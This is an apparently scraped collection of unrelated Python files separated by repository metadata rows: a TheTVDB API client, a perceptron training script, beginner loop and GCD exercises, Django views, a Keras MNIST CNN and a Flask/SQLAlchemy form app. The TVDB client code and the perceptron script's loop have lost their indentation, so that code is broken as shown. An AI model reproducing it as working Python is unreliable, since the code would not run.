data = data.replace(u"&", u"&")
data = data.strip()
return data
#end _cleanData
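    # e.g. self._cleanData(u"Bob &amp; Rose  ") -> u"Bob & Rose"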
def _getSeries(self, series):
"""This searches TheTVDB.com for the series name,
If a custom_ui UI is configured, it uses this to select the correct
        series. If not, and interactive == True, ConsoleUI is used; otherwise
        BaseUI is used to select the first result.
"""
series = urllib.quote(series.encode("utf-8"))
self.log.debug("Searching for show %s" % series)
seriesEt = self._getetsrc(self.config['url_getSeries'] % (series))
allSeries = []
for series in seriesEt:
sn = series.find('SeriesName')
value = self._cleanData(sn.text)
cur_sid = series.find('id').text
self.log.debug('Found series %s (id: %s)' % (value, cur_sid))
allSeries.append( {'sid':cur_sid, 'name':value} )
#end for series
if len(allSeries) == 0:
self.log.debug('Series result returned zero')
raise tvdb_shownotfound("Show-name search returned zero results (cannot find show on TVDB)")
if self.config['custom_ui'] is not None:
self.log.debug("Using custom UI %s" % (repr(self.config['custom_ui'])))
ui = self.config['custom_ui'](config = self.config, log = self.log)
else:
if not self.config['interactive']:
self.log.debug('Auto-selecting first search result using BaseUI')
ui = BaseUI(config = self.config, log = self.log)
else:
                self.log.debug('Interactively selecting show using ConsoleUI')
ui = ConsoleUI(config = self.config, log = self.log)
#end if config['interactive]
#end if custom_ui != None
return ui.selectSeries(allSeries)
#end _getSeries
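    # Each allSeries entry is a plain dict such as {'sid': '76156', 'name': u'Scrubs'}
    # (values illustrative); ui.selectSeries returns the single chosen entry.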
def _parseBanners(self, sid):
"""Parses banners XML, from
http://www.thetvdb.com/api/[APIKEY]/series/[SERIES ID]/banners.xml
        Banners are retrieved using t['show name']['_banners'], for example:
>>> t = Tvdb(banners = True)
>>> t['scrubs']['_banners'].keys()
['fanart', 'poster', 'series', 'season']
>>> t['scrubs']['_banners']['poster']['680x1000']['35308']['_bannerpath']
'http://www.thetvdb.com/banners/posters/76156-2.jpg'
>>>
Any key starting with an underscore has been processed (not the raw
data from the XML)
This interface will be improved in future versions.
"""
self.log.debug('Getting season banners for %s' % (sid))
bannersEt = self._getetsrc( self.config['url_seriesBanner'] % (sid) )
banners = {}
for cur_banner in bannersEt.findall('Banner'):
bid = cur_banner.find('id').text
btype = cur_banner.find('BannerType')
btype2 = cur_banner.find('BannerType2')
if btype is None or btype2 is None:
continue
btype, btype2 = btype.text, btype2.text
if not btype in banners:
banners[btype] = {}
if not btype2 in banners[btype]:
banners[btype][btype2] = {}
if not bid in banners[btype][btype2]:
banners[btype][btype2][bid] = {}
self.log.debug("Banner: %s", bid)
for cur_element in cur_banner.getchildren():
tag = cur_element.tag.lower()
value = cur_element.text
if tag is None or value is None:
continue
tag, value = tag.lower(), value.lower()
self.log.debug("Banner info: %s = %s" % (tag, value))
banners[btype][btype2][bid][tag] = value
for k, v in banners[btype][btype2][bid].items():
if k.endswith("path"):
new_key = "_%s" % (k)
self.log.debug("Transforming %s to %s" % (k, new_key))
new_url = self.config['url_artworkPrefix'] % (v)
self.log.debug("New banner URL: %s" % (new_url))
banners[btype][btype2][bid][new_key] = new_url
self._setShowData(sid, "_banners", banners)
    # Alternative to tvdb_api's method for retrieving graphics URLs: returns a list
    # that preserves the user rating order, highest rated to lowest rated
def ttvdb_parseBanners(self, sid):
"""Parses banners XML, from
http://www.thetvdb.com/api/[APIKEY]/series/[SERIES ID]/banners.xml
        Banners are retrieved using t['show name']['_banners'], for example:
>>> t = Tvdb(banners = True)
>>> t['scrubs']['_banners'].keys()
['fanart', 'poster', 'series', 'season']
>>> t['scrubs']['_banners']['poster']['680x1000']['35308']['_bannerpath']
'http://www.thetvdb.com/banners/posters/76156-2.jpg'
>>>
Any key starting with an underscore has been processed (not the raw
data from the XML)
This interface will be improved in future versions.
        Changed in this interface is that a list of URLs is created to preserve the user rating order from
top rated to lowest rated.
"""
self.log.debug('Getting season banners for %s' % (sid))
bannersEt = self._getetsrc( self.config['url_seriesBanner'] % (sid) )
banners = {}
bid_order = {'fanart': [], 'poster': [], 'series': [], 'season': []}
for cur_banner in bannersEt.findall('Banner'):
bid = cur_banner.find('id').text
btype = cur_banner.find('BannerType')
btype2 = cur_banner.find('BannerType2')
if btype is None or btype2 is None:
continue
btype, btype2 = btype.text, btype2.text
if not btype in banners:
banners[btype] = {}
if not btype2 in banners[btype]:
banners[btype][btype2] = {}
if not bid in banners[btype][btype2]:
banners[btype][btype2][bid] = {}
if btype in bid_order.keys():
if btype2 != u'blank':
bid_order[btype].append([bid, btype2])
self.log.debug("Banner: %s", bid)
for cur_element in cur_banner.getchildren():
tag = cur_element.tag.lower()
value = cur_element.text
if tag is None or value is None:
continue
tag, value = tag.lower(), value.lower()
self.log.debug("Banner info: %s = %s" % (tag, value))
banners[btype][btype2][bid][tag] = value
for k, v in banners[btype][btype2][bid].items():
if k.endswith("path"):
new_key = "_%s" % (k)
self.log.debug("Transforming %s to %s" % (k, new_key))
new_url = self.config['url_artworkPrefix'] % (v)
self.log.debug("New banner URL: %s" % (new_url))
banners[btype][btype2][bid][new_key] = new_url
graphics_in_order = {'fanart': [], 'poster': [], 'series': [], 'season': []}
for key in bid_order.keys():
for bid in bid_order[key]:
graphics_in_order[key].append(banners[key][bid[1]][bid[0]])
return graphics_in_order
# end ttvdb_parseBanners()
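    # The returned dict maps each banner type to a list of banner-info dicts,
    # highest rated first, so e.g. graphics_in_order['poster'][0]['_bannerpath']
    # would be the top-rated poster URL (a sketch; keys depend on the XML returned).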
def _parseActors(self, sid):
"""Parsers actors XML, from
http://www.thetvdb.com/api/[APIKEY]/series/[SERIES ID]/actors.xml
        Actors are retrieved using t['show name']['_actors'], for example:
>>> t = Tvdb(actors = True)
>>> actors = t['scrubs']['_actors']
>>> type(actors)
<class 'tvdb_api.Actors'>
>>> type(actors[0])
<class 'tvdb_api.Actor'>
>>> actors[0]
<Actor "Zach Braff">
>>> sorted(actors[0].keys())
['id', 'image', 'name', 'role', 'sortorder']
>>> actors[0]['name']
u'Zach Braff'
>>> actors[0]['image']
'http://www.thetvdb.com/banners/actors/43640.jpg'
Any key starting with an underscore has been processed (not the raw
data from the XML)
"""
self.log.debug("Getting actors for %s" % (sid))
actorsEt = self._getetsrc(self.config['url_actorsInfo'] % (sid))
cur_actors = Actors()
for curActorItem in actorsEt.findall("Actor"):
curActor = Actor()
for curInfo in curActorItem:
tag = curInfo.tag.lower()
value = curInfo.text
if value is not None:
if tag == "image":
value = self.config['url_artworkPrefix'] % (value)
else:
value = self._cleanData(value)
curActor[tag] = value
cur_actors.append(curActor)
self._setShowData(sid, '_actors', cur_actors)
def _getShowData(self, sid):
"""Takes a series ID, gets the epInfo URL and parses the TVDB
XML file into the shows dict in layout:
shows[series_id][season_number][episode_number]
"""
# Parse show information
self.log.debug('Getting all series data for %s' % (sid))
seriesInfoEt = self._getetsrc(self.config['url_seriesInfo'] % (sid))
for curInfo in seriesInfoEt.findall("Series")[0]:
tag = curInfo.tag.lower()
value = curInfo.text
if value is not None:
if tag in ['banner', 'fanart', 'poster']:
value = self.config['url_artworkPrefix'] % (value)
else:
value = self._cleanData(value)
self._setShowData(sid, tag, value)
self.log.debug("Got info: %s = %s" % (tag, value))
#end for series
# Parse banners
if self.config['banners_enabled']:
self._parseBanners(sid)
# Parse actors
if self.config['actors_enabled']:
self._parseActors(sid)
# Parse episode data
self.log.debug('Getting all episodes of %s' % (sid))
epsEt = self._getetsrc( self.config['url_epInfo'] % (sid) )
for cur_ep in epsEt.findall("Episode"):
seas_no = int(cur_ep.find('SeasonNumber').text)
ep_no = int(cur_ep.find('EpisodeNumber').text)
for cur_item in cur_ep.getchildren():
tag = cur_item.tag.lower()
value = cur_item.text
if value is not None:
if tag == 'filename':
value = self.config['url_artworkPrefix'] % (value)
else:
value = self._cleanData(value)
self._setItem(sid, seas_no, ep_no, tag, value)
#end for cur_ep
    #end _getShowData
def _nameToSid(self, name):
"""Takes show name, returns the correct series ID (if the show has
already been grabbed), or grabs all episodes and returns
the correct SID.
"""
if name in self.corrections:
self.log.debug('Correcting %s to %s' % (name, self.corrections[name]) )
sid = self.corrections[name]
else:
self.log.debug('Getting show %s' % (name))
selected_series = self._getSeries( name )
sname, sid = selected_series['name'], selected_series['sid']
self.log.debug('Got %s, sid %s' % (sname, sid))
self.corrections[name] = sid
self._getShowData(sid)
#end if name in self.corrections
return sid
#end _nameToSid
def __getitem__(self, key):
"""Handles tvdb_instance['seriesname'] calls.
The dict index should be the show id
"""
if isinstance(key, (int, long)):
# Item is integer, treat as show id
if key not in self.shows:
self._getShowData(key)
return self.shows[key]
key = key.lower() # make key lower case
sid = self._nameToSid(key)
self.log.debug('Got series id %s' % (sid))
return self.shows[sid]
#end __getitem__
def __repr__(self):
return str(self.shows)
#end __repr__
#end Tvdb
def main():
"""Simple example of using tvdb_api - it just
grabs an episode name interactively.
"""
tvdb_instance = Tvdb(interactive=True, debug=True, cache=False)
print tvdb_instance['Lost']['seriesname']
print tvdb_instance['Lost'][1][4]['episodename']
if __name__ == '__main__':
main()
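# A minimal non-interactive usage sketch (assumes network access to thetvdb.com):
#   t = Tvdb(cache=False)
#   print t['scrubs'][1][4]['episodename']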
| [
"[email protected]"
] | |
7c9050279a3de4691a1bb15a38d626d1f8517c3e | 6d6ad8fca4051e5b4e46bef431878059bac9161c | /howtouseMCP.py | 88ec0503dfbf6fec198e37921c812fdae93fda4c | [] | no_license | weichen0407/MCP-Digit-Recognition | 340b71e2542afcb7612bcb2a2134872afc4873a9 | d0b250e7c6b3384e5f7b9f9939f1c192a8d10880 | refs/heads/main | 2023-08-15T12:36:19.795385 | 2021-09-27T20:43:37 | 2021-09-27T20:43:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,347 | py | import numpy as np
import mcp  # "import mcp.py" would fail at runtime; modules are imported without the .py extension
# First create the model with the desired inputs and outputs (inputs, outputs)
mcpModel = mcp.MCP(784, 10)
# Then use the MCP's getData function with a csv file to get the data as a matrix and labels as an array
traindata, trainlabs = mcpModel.getData('train.csv')
# If used for training, reshape into an array of size (numinstances x numoutputs)
trainlabels = mcpModel.reshapeLabels(trainlabs)
# Use getData function to separate file into data and labels
testdata, testlabels = mcpModel.getData('test.csv')
# Use the train function with testing data and reshaped labels
mcpModel.train(traindata, trainlabels)
# Predict function does one instance at a time, so use a for loop to iterate through all the testing instances
# and calculate accuracy based off of that
testaccuracy = 0
n = testdata.shape[0]
for testIndex in range(n):
# use predict with one instance of data at a time
result = mcpModel.predict(testdata[testIndex])
actual = testlabels[testIndex]
# Compare the actual label and the predicted label, if equal increment the count by 1
    if result == actual:
        testaccuracy += 1
# Get the total accuracy after testing
finalaccuracy = (testaccuracy / n) * 100.0
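# Note: "/" above is true division under Python 3 (which this script's print()
# calls suggest); under Python 2 it would need float(testaccuracy) / n to avoid
# integer division truncating the accuracy to 0.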
# Just to display accuracy
print("Accuracy of Multi-Class Perceptron is approximately {}%".format(finalaccuracy)) | [
"[email protected]"
] | |
754705493d33379d2a6b30e114411413ba153370 | 0d2cd2a19d37a4edbda53d9b22fefe726fa06457 | /while_list_indexes.py | ebb0808b61234444afa4cdc8acd38261c7ce5419 | [] | no_license | gkalidas/python-django-bundle | 22ab9b1cc798f6d995385e7959acf2057cd6ad01 | 66df9604d6b87d6398afca2127e70d8d11c8b95c | refs/heads/master | 2023-03-15T10:02:23.495413 | 2020-08-12T16:55:05 | 2020-08-12T16:55:05 | 266,520,942 | 0 | 0 | null | 2021-03-25T23:56:47 | 2020-05-24T10:50:14 | Python | UTF-8 | Python | false | false | 208 | py | # while with list and indexes
ex_list = ['one', 'two', 'three', 'four']
counter = 0
max_index = len(ex_list) - 1
while counter <= max_index:
number = ex_list[counter]
print(number)
counter += 1
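# The same traversal written idiomatically (an alternative, not a replacement):
# for number in ex_list:
#     print(number)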
| [
"[email protected]"
] | |
e7e2e35e74f6f746945d6189c17e6e7c5bf68ec4 | 4c852fab792606580acb3f3a61b7f86ae25930b0 | /Python/MIT-CompThinking/MITx600.1x/ProblemSets/wk3/L5PROBLEM5.py | 5fc93127f17702a2607600df981bd5e7b2f929a5 | [] | no_license | hmchen47/Programming | a9767a78a35c0844a1366391f48b205ff1588591 | 9637e586eee5c3c751c96bfc5bc1d098ea5b331c | refs/heads/master | 2022-05-01T01:57:46.573136 | 2021-08-09T04:29:40 | 2021-08-09T04:29:40 | 118,053,509 | 2 | 1 | null | 2021-09-20T19:54:02 | 2018-01-19T00:06:04 | Python | UTF-8 | Python | false | false | 259 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
def gcdRecur(a, b):
'''
a, b: positive integers
returns: a positive integer, the greatest common divisor of a & b.
'''
if b == 0:
return a
else:
return gcdRecur(b, a % b) | [
"[email protected]"
] | |
5a7cf3eb0101279de44ad43c46ab42689bd0eb5e | 8d6fb31cd96632d02db88663ea0a2112103033ce | /chaper7_compile_to_c/run.py | 76688b919787e0b0416a76253310c6c695f7c7a0 | [] | no_license | CodevilWang/high_perf_python | d75182732fed84b53f02f14d64b931ed0d1c001a | 000672c006f3fd5604b45a7857d72e55003fc30e | refs/heads/master | 2021-09-15T18:50:26.986311 | 2018-06-08T13:23:53 | 2018-06-08T13:23:53 | 114,531,549 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 86 | py | #!/usr/bin/env python
import sys
def calculate_z_serialize_purepython(maxiter, zs, cs):
    pass  # the source file is truncated here; no function body exists in the original | [
"[email protected]"
] | |
275aa3e362920aae1e2af84fe0380f36fa448f39 | 55c250525bd7198ac905b1f2f86d16a44f73e03a | /Python/pygame/pygameweb/pygameweb/db.py | 57c70ca70133b811d4447037d0df7cd54b72e632 | [
"BSD-2-Clause"
] | permissive | NateWeiler/Resources | 213d18ba86f7cc9d845741b8571b9e2c2c6be916 | bd4a8a82a3e83a381c97d19e5df42cbababfc66c | refs/heads/master | 2023-09-03T17:50:31.937137 | 2023-08-28T23:50:57 | 2023-08-28T23:50:57 | 267,368,545 | 2 | 1 | null | 2022-09-08T15:20:18 | 2020-05-27T16:18:17 | null | UTF-8 | Python | false | false | 129 | py | version https://git-lfs.github.com/spec/v1
oid sha256:95c026dc0e7051336cd999158979e81f159d4470489660469d0e0175c66400da
size 1274
| [
"[email protected]"
] | |
ec81f69f8b35b27ca38c0fabe125ba6ef4bc3a1d | 1975ee674b36084366b1bbe2c091d8f0f8795dc0 | /demo/class_views.py | 49ac0086b684256a0215318d23d4992296ad6f5e | [] | no_license | srikanthpragada/PYTHON_03_JULY_2018_WEBDEMO | f193213788deadcab7ac7b183328269ba1334488 | 56e076ad30703117cafc56d6d95449c6ec8eebb2 | refs/heads/master | 2020-03-25T11:45:53.128704 | 2018-08-23T15:29:05 | 2018-08-23T15:29:05 | 143,747,408 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 877 | py | from django.views.generic import TemplateView, ListView
from django.shortcuts import render
from .forms import LoginForm
from .models import Course
class ClassView1(TemplateView):
template_name = 'class_view1.html'
class LoginView(TemplateView):
template_name = 'login.html'
def get(self, request):
form = LoginForm()
return render(request, self.template_name, {'form': form})
def post(self, request):
form = LoginForm(request.POST)
if form.is_valid():
print(form.cleaned_data['username'], form.cleaned_data['password'])
return render(request, self.template_name, {'form': form})
# Generic View - ListView demo
class ListCourseView(ListView):
model = Course
template_name = "courses.html" # default is demo/course_list.html
context_object_name = 'courses' # default is object_list
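# A hypothetical urls.py wiring for these class-based views (paths and names assumed):
# from django.urls import path
# from .class_views import ClassView1, LoginView, ListCourseView
# urlpatterns = [
#     path('view1/', ClassView1.as_view()),
#     path('login/', LoginView.as_view()),
#     path('courses/', ListCourseView.as_view()),
# ]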
| [
"[email protected]"
] | |
0fae2317ff82c61b45f4af1f32caf571d43b7215 | a23139a3a1de7427843c5216e2abc90cced88487 | /video_learn/03_keras_mnist.py | 32bf1d15fbaf25ea10d614a0c50a9b84df6f4f12 | [] | no_license | shxiangyan/Document | 7aeb3e07665662fa67179de4484d20c138256205 | 10352279b8696bbd934adb7ffdb63e0c017b8adb | refs/heads/master | 2021-02-07T01:04:58.884043 | 2020-04-27T14:48:13 | 2020-04-27T14:48:13 | 253,468,956 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,969 | py | import numpy as np
from keras.datasets import mnist
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import Dropout
from keras.layers import Flatten
from keras.layers.convolutional import Conv2D
from keras.layers.convolutional import MaxPooling2D
# Read in the data first
(X_train, y_train), (X_test, y_test) = mnist.load_data("../test_data_home")
# Take a look at what the dataset looks like
print(X_train[0].shape)
print(y_train[0])
# Reshape the grayscale handwritten digits in the training set into the standard
# 4-D tensor form, i.e. (number of samples, height, width, 1),
# and convert the pixel values to floating point
X_train = X_train.reshape(X_train.shape[0], 28, 28, 1).astype('float32')
X_test = X_test.reshape(X_test.shape[0], 28, 28, 1).astype('float32')
# Every pixel value lies between 0 and 255, so divide by 255 to scale the values into the 0-1 range
X_train /= 255
X_test /= 255
# The output layer needs 10 nodes, so it is best to one-hot encode the target digits 0-9
def tran_y(y):
y_ohe = np.zeros(10)
y_ohe[y] = 1
return y_ohe
# Re-encode the labels as one-hot vectors
y_train_ohe = np.array([tran_y(y_train[i]) for i in range(len(y_train))])
y_test_ohe = np.array([tran_y(y_test[i]) for i in range(len(y_test))])
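# Equivalent one-liner using Keras' built-in helper (an alternative; assumes
# keras.utils.to_categorical is available in this Keras version):
# from keras.utils import to_categorical
# y_train_ohe = to_categorical(y_train, 10)
# y_test_ohe = to_categorical(y_test, 10)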
# Build the convolutional neural network
model = Sequential()
# Add a convolutional layer with 64 filters, each covering a 3*3*1 receptive field;
# the filter stride is 1, the image is zero-padded around its border ("same" padding),
# and a ReLU non-linearity is applied
model.add(Conv2D(filters=64, kernel_size=(3, 3), strides=(1, 1), padding='same',
input_shape=(28, 28, 1), activation='relu'))
# Add a max-pooling layer
model.add(MaxPooling2D(pool_size=(2, 2)))
# Add a Dropout layer with a dropout probability of 0.5
model.add(Dropout(0.5))
# Repeat the same pattern to build a deeper network
model.add(Conv2D(128, kernel_size=(3, 3), strides=(1, 1), padding='same',
activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.5))
model.add(Conv2D(256, kernel_size=(3, 3), strides=(1, 1), padding='same',
activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.5))
# Flatten the nodes of the current layer
model.add(Flatten())
# Build the fully-connected layers
model.add(Dense(128, activation='relu'))
model.add(Dense(64, activation='relu'))
model.add(Dense(32, activation='relu'))
model.add(Dense(10, activation='softmax'))
# Define the loss function; for classification problems, cross-entropy is the usual choice
model.compile(loss='categorical_crossentropy', optimizer='adagrad', metrics=['accuracy'])
# Feed in batches of samples and train
model.fit(X_train, y_train_ohe, validation_data=(X_test, y_test_ohe)
, epochs=20, batch_size=128)
# Evaluate the model's accuracy on the test set
# verbose: progress display mode. 0 = show nothing, 1 = show a progress bar
scores = model.evaluate(X_test, y_test_ohe, verbose=0)
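# Display the result; with metrics=['accuracy'] in compile() above, scores is
# [loss, accuracy]. This print is an addition for completeness.
print('Test loss: %.4f, test accuracy: %.4f' % (scores[0], scores[1]))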
| [
"[email protected]"
] | |
8b04ac74aeadb6ba21d5c623f12f988aaa3af34c | bbfb3856386b7bbb0ec47e02d8be3f9764b8523a | /app.py | e104743f47838b66f9a0d73687f3f6529bd99019 | [] | no_license | tonnysilas/sqlpractice | 67f2fbb1e9c2074fbd59acd04e904c0955989bda | 12cce4da59cac4f86aa226da5f731ac9b7cd6986 | refs/heads/main | 2023-04-28T21:13:38.881594 | 2021-05-31T09:40:04 | 2021-05-31T09:40:04 | 372,434,016 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,888 | py | from enum import unique
from flask import Flask
import os
from flask import render_template
from flask_sqlalchemy import SQLAlchemy
from flask import request
app = Flask(__name__)
project_dir = os.path.dirname(os.path.abspath(__file__)) #finding the current app path. (Location of this file)
database_file = "sqlite:///{}".format(os.path.join(project_dir, "formdatabase.db")) # creating a database file (formdatabase.db) in the above found path.
app.config["SQLALCHEMY_DATABASE_URI"] = database_file # connecting the database file (formdatabase.db) to the sqlalchemy dependency.
db = SQLAlchemy(app) # connecting this app.py file to the sqlalchemy
@app.before_first_request
def create_table():
db.create_all()
class Book(db.Model): #creating a model for the cell called title in the form
title = db.Column(db.String(80), unique = True, nullable = False, primary_key = True) #this means that the cell will only accept 80 string characters at max without repeating any. It can not be empty and is a mandatory field
def __repr__(self):
return "<Title: {}>".format(self.title)
@app.route('/', methods=["GET", "POST"])
def home():
    # validating the content of the form. request.form is an empty (falsy) dict-like on a plain GET, so this branch is skipped then
if request.form:
title_from_form = request.form.get('title') # assigns the content of the title field to the variable
book = Book(title=title_from_form) # instance of the Book class. assigned to the 'book' variable
db.session.add(book) # adds the data to the session
db.session.commit() # this commits the data to the database
books = Book.query.all() # this retrieves all the contents of the book table.
return render_template('form.html', iwe = books) # rendering the html page alongside the queried books to the browser.
if __name__=="__main__":
app.run(debug=True)
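# form.html (not shown in this snippet) is assumed to POST a field named "title"
# and to iterate over the "iwe" context variable, e.g.:
# <form method="POST"><input name="title"><button>Add</button></form>
# {% for book in iwe %}<li>{{ book.title }}</li>{% endfor %}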
| [
"[email protected]"
] |